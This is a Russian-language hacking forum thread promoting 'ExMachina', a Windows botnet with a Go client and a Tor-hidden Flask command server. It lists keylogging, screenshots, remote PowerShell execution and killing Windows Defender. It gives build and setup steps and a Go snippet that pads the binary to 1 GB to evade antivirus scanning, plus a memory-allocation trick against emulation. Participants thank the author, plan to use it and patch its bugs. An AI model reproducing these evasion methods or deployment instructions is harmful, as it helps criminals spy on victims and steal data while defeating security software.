malware ExMachina - Ботнет для Windows

[voldemort]

Я чувствую интерес к вашему выбору технологий, описанных вами, особенно к тому, почему вы выбрали использовать Python в качестве языка для сервера управления, а не такой же Golang, как в клиентской части? Есть ли какие-то конкретные причины или соображения?

Просто потому, что написание серверной части на Go требует больше усилий и времени. Python довольно прост и прямолинеен, плюс у меня есть опыт разработки веб-приложения с его использованием, в то время как с Go я никогда не создавал полноценное веб-приложение.

 

[Gr00ve]

Просто потому, что написание серверной части на Go требует больше усилий и времени. Python довольно прост и прямолинеен, плюс у меня есть опыт разработки веб-приложения с его использованием, в то время как с Go я никогда не создавал полноценное веб-приложение.

Рад что кто то выложил проект на Go, многие дальше python ничего не знают. Для панели управления я могу посоветовать NodeJs. Но если Вшим требованиям отвечает Python, тогда почему бы и нет .

 

[N3tSh4d0w]

Шикарный проект, возьму на вооружение, спасибо большое автору!

 

[weaver]

Рад что кто то выложил проект на Go, многие дальше python ничего не знают. Для панели управления я могу посоветовать NodeJs. Но если Вшим требованиям отвечает Python, тогда почему бы и нет .

А почему питон плохой? Например можно взять tornado для высоких нагрузок. Я бы наверно не рекомендвал NodeJs использовать сейчас все кому не лень ковыряют v8. И там очень много багов.

 

[Gr00ve]

А почему питон плохой? Например можно взять tornado для высоких нагрузок. Я бы наверно не рекомендвал NodeJs использовать сейчас все кому не лень ковыряют v8. И там очень много багов.

Я не говорю что питон плох, просто он уже замылил глаза, хотел увидеть статью на другом языке , как пример увидел на GO, что на мой взгляд в отличии от питона более интересен.

 

[nottse2]

I removed it for privacy reasons.
Now it will go directly to the server database.

use telegram bots

 

[voldemort]

Привет братья! Большое обновление.

Мне удалось обойти антивирусную программу "Защитник Windows" в Windows 10. Пожалуйста, проверьте ее на 11 и дайте мне знать, работает ли она.

Концепция:

Сначала увеличиваем размер исполняемого файла, чтобы избежать статического анализа диска. Вы можете сделать это на любом другом языке. Я выбираю Голанг, вот как

package main

import (
    "fmt"
    "os"
)

func main() {
    //add zeros to the end of the executable file
    var zeros [1000000000]byte
    file, err := os.OpenFile("ExMachina.exe", os.O_WRONLY|os.O_APPEND, 0666)
    if err != nil {
        fmt.Println(err)
        return
    }
    defer file.Close()
    _, err = file.Write(zeros[:])
    if err != nil {
        fmt.Println(err)
        return
    }
    fmt.Println("Done")
}

Размер исполняемого файла составляет 1 ГБ, но в сжатом виде он составит примерно 4 МБ.

Второй и заключительный этап: выделяем и заполняем 100 мегабайт памяти.

В этом первом примере мы просто выделяем и заполняем 100 мегабайт памяти. Этого достаточно, чтобы обескуражить

любая AV-эмуляция.

Примечание. В приведенном ниже коде большая часть AV просто останавливается во время malloc, проверяя состояние выделенного

Вам даже не понадобится указатель.

Видите, как легко уменьшить AV-обнаружение? Также этот метод основан на классическом и очень распространенном malloc.

функция и не требует каких-либо строк, которые можно было бы использовать для построения подписи. Единственным недостатком является

Скачок памяти на 100 МБ, который можно обнаружить посредством точного мониторинга системы.

Обратите внимание, что вам следует настроить размер исполняемого файла и метод обхода для разных целей, чтобы избежать обнаружения в будущем. Вот руководство.

 

[zinc]

Инди... где ты сейчас? (

 

[voldemort]

Привет, друзья, представляем ExMachina — ботнет для Windows, Клиент написан на языке программирования Golang, а сервер управления выполнен на языке Python с использованием веб-фреймворка Flask. , который использует сеть Tor для связи с ботами.
Посмотреть вложение 75383

Функции:
- Анонимный C2C-сервер благодаря сети Tor
- Прослушивание ввода с клавиатуры пользователя
- съемка скриншотов
- Запуск команд PowerShell
- попробуйте убить процессы защитника Windows
Посмотреть вложение 75384

Посмотреть вложение 75385

Посмотреть вложение 75386
Отмечает, что этот проект еще не завершен, так как требуется дополнительное тестирование для обхода всех существующих антивирусов, поэтому список дел - это улучшение кода, чтобы он обходил все возможные антивирусы, и добавление функции для запуска зашифрованного шелл-кода.
for the hardware you need a server for at least 4GB of ram and 2cpu cores, as for the software: Tor, nginx(optional), python, and Go
использовать:
настроить скрытый сервер tor
закодируйте весь адрес onionv3, веб-перехватчик Discord и имя исполняемого файла, потому что он попытается самостоятельно удалить
отредактируйте main.go, добавив новые данные в кодировке Base64

cd ExMachina
GOOS=windows go build -ldflags="-w -s -H=windowsgui"

выходной исполняемый файл составляет около 6,5 МБ
запустите сервер, запустив python wsgi.py(for debuging and testing python test.py), зарегистрируйте администратора (по умолчанию имя пользователя администратора — «ErenYeager», вы можете изменить его, если хотите) перейдите по маршруту /register и зарегистрируйте пароль администратора
наслаждаться

Убедитесь, что вы загрузили последнюю версию, потому что в первой версии есть небольшая ошибка в функции VictimExists, из-за которой она не работает и программа завершается.
Последняя версия исправлена и содержит несколько функций, которых нет в предыдущей версии. Спасибо.

 

[voldemort]

Привет, братья, убедитесь, что вы отредактировали файл tor/tor.go, так как TOR URL не существует.

TOR_TAR_URL    = "https://dist.torproject.org/torbrowser/13.0.9/tor-expert-bundle-windows-x86_64-13.0.9.tar.gz"

Обновите его до этого:

TOR_TAR_URL    = "https://dist.torproject.org/torbrowser/13.0.11/tor-expert-bundle-windows-x86_64-13.0.11.tar.gz"

 

[swagcat228]

А почему питон плохой? Например можно взять tornado для высоких нагрузок. Я бы наверно не рекомендвал NodeJs использовать сейчас все кому не лень ковыряют v8. И там очень много багов.

Питон, как и Раст, как и репозитории современных дистрибутивов...

 

[voldemort]

небольшие обновления

 

[ssx]

небольшие обновления

DB not initiated, looks like you forget to add:

27:  app.app_context().push()
<SNIP>
115: db.create_all()